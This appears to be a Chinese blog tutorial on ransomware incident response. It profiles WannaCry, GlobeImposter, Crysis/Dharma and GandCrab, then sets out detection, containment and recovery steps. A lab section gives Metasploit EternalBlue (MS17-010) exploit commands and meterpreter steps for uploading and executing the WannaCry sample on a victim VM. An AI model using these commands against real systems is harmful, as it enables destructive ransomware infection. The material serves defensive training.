526互联

应急响应—勒索病毒

发布时间 2023-07-25 14:37:28作者: Mr-Ryan

勒索病毒简介

• 勒索病毒,是一种新型电脑病毒,主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。这种病毒利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。

• 勒索病毒通常使用非对称和对称加密算法组合的形式来加密文件,绝大部分勒索病毒均无法通过技术手段解密,一般无法溯源,危害巨大。

常见勒索病毒

WannaCry

  • 2017年5月12日,WannaCry蠕虫通过MS17-010漏洞在全球范围大爆发,感染了大量的计算机,该蠕虫感染计算机后会向计算机中植入勒索病毒,导致电脑大量文件被加密。受害者电脑被黑客锁定后,病毒会提示支付价值相当于300美元(约合人民币2069元)的比特币才可解锁。

  • WannaCry(又叫Wanna Decryptor),一种“蠕虫式”的勒索病毒软件,大小3.3MB,由不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播。

  • WannaCry勒索病毒全球大爆发,至少150个国家、30万名用户中招,造成损失达80亿美元,已经影响到金融,能源,医疗等众多行业,造成严重的危机管理问题。

  • 常见后缀名:wncry

  • 传播方式:“永恒之蓝”漏洞

  • 特征:启动时会连接一个不存在的URL,创建系统服务mssecsvc2.0,释放路径为windows目录

GlobeImposter

  • GlobeImposter 勒索病毒于 2017年5月首次出现,主要通过钓鱼的方式传播

  • 自2018年8月21日起,多地发生GlobeImposter勒索病毒事件,此次攻击目标主要是开启远程桌面服务的服务器,攻击者通过暴力破解服务器密码,对内网服务器发起扫描并人工投放勒索病毒,导致文件被加密,暂时无法解密。

  • 常见后缀名:auchentoshan、动物名+4444 等

  • 传播方法:RDP 暴力破解、钓鱼邮件、捆绑软件

  • 特征:释放在 %appdata% 或 %localappdata%

Crysis/Dharma

  • Crysis/Dharma 勒索病毒最早出现在 2016 年,2017 年 5 月在万能密钥被公布之后,消失了一段时间,但在 2017 年 6 月开始继续更新。攻击方法同样是通过远程 RDP 暴力破解的方式,植入用户的服务器进行攻击。由于采用 AES+RSA 的加密方式,其最新版本无法解密。

  • 常见后缀:id + 勒索邮箱 + 特定后缀

  • 传播方式:RDP 暴力破解

  • 特征:勒索信位置在 startup 目录;样本位置在 % windir%\System32、startup 目录、% appdata% 目录

GandCrab

  • GandCrab勒索病毒于2018年1月面世以来,一年内历经多次版本更新,目前最新的版本为V5。该病毒利用多种方式对企业网络进行攻击传播,受感染主机上的数据库、文档、图片、压缩包等文件将被加密,若没有相应数据或文件的备份,将会影响业务的正常运行。

  • 病毒采用Salsa20和RSA-2048算法对文件进行加密,并修改文件后缀为.GDCB、.GRAB、.KRAB或5-10位随机字母,勒索信息文件为GDCB-DECRYPT.txt、KRAB-DECRYPT.txt、[5-10随机字母]-DECRYPT.html\txt,并将感染主机桌面背景替换为勒索信息图片。

  • 常见后缀:随机生成

  • 传播方式:RDP暴力破解、钓鱼邮件、捆绑软件、僵尸网络、漏洞传播等

  • 特征:样本执行完毕后自动删除,并会修改感染主机桌面背景,有后缀 MANUAL.txt、DECRYPT.txt

解密方法

解密方法 难度系数
入侵攻击者的服务器,获取非对称加密的私钥,用非对称加密的私钥, 解密经过非对称加密公钥加密后的对称加密密钥,进而解密文件数据
勒索病毒加密算法设计存在问题,比如2018年“微信支付”勒索病毒, 加密密钥存放在本地,所以很快就被破解
暴力破解
支付赎金,下载特定的解密器

蠕虫攻击流程

模拟攻击——Wannacry勒索病毒

• WannaCry勒索病毒主要行为是传播和勒索

• 传播:利用基于445端口的SMB漏洞MS17-010(永恒之蓝)进行传播

• 勒索:释放文件,包括加密器、解密器、说明文件、语言文件等;内存加载加密器模块,加密执行类型文件,全部加密后启动解密器;解密器启动后,设置桌面背景显示勒索信息,弹出窗口显示付款账号和勒索信息

• 注意:实验复现过程中必须在虚拟机中完成,运行之前关闭虚拟机Win7文件共享,真机上一旦被感染你就真的只能想哭了(wannacry)

漏洞攻击

1、通过“永恒之蓝”进行攻击
搜索相关模块

search ms17-010

使用永恒之蓝利用模块:

use exploit/windows/smb/ms17_010_eternalblue

设置好相关参数后,开始攻击

run


2. 解压勒索病毒
a. 解压勒索病毒

unzip 02\ 勒索-wannacry病毒样本-123456.zip

b. 再次解压

ls -i
find -inum 166494 -exec unzip {} \;

c. 重命名wcry文件

  1. 上传 wannacry 勒索病毒文件

    upload /root/test/wcry.exe

  2. 执行勒索病毒文件:

    execute -f wcry.exe

  3. 查看勒索病毒是否运行:

    ps -ef | grep wcry.exe

  4. 被攻击的主机被勒索病毒加密

应急响应—事件处置

  1. 对勒索病毒判定

    对感染了勒索病毒的主机进行查看,发现是wannacry勒索病毒;所有被加密的文件变为后缀名为 .wncry 的文件,界面显示比特币支付提示,显示勒索倒计时

  2. 网络排查

    netstat -ano

    发现恶意连接

  3. 通过PID 查看程序执行目录:

    wmic process where processid=2984 get name,executablepath

  4. 查看可疑的 IP 地址:87.236.194.23、159.69.207.20、176.31.163.89

    微步在线:https://x.threatbook.cn/

应急响应—事件抑制

1、隔离问题主机,断开网络连接,尽量关闭外部连接
2、将135,139,445端口关闭,封堵非业务端口
3、将服务器/主机密码全部更改为复杂的高强度的密码
4、安装安全补丁,尤其是 MS17-010 漏洞的补丁

应急响应—根除与恢复

1、终端安装企业级防病毒软件
2、使用流量监控设备进行内网流量监控
3、出口防火墙封堵可疑地址

勒索病毒在线查询与解密

wannacry:https://www.thinkbar.net/WannaCry.html

360安全:https://lesuobingdu.360.cn/

奇安信:https://lesuobingdu.qianxin.com/

腾讯:https://guanjia.qq.com/pr/ls/

深信服:https://edr.sangfor.com.cn/#/information/ransom_search

勒索病毒处置流程


(图片来自网络,如有侵权,请联系删除)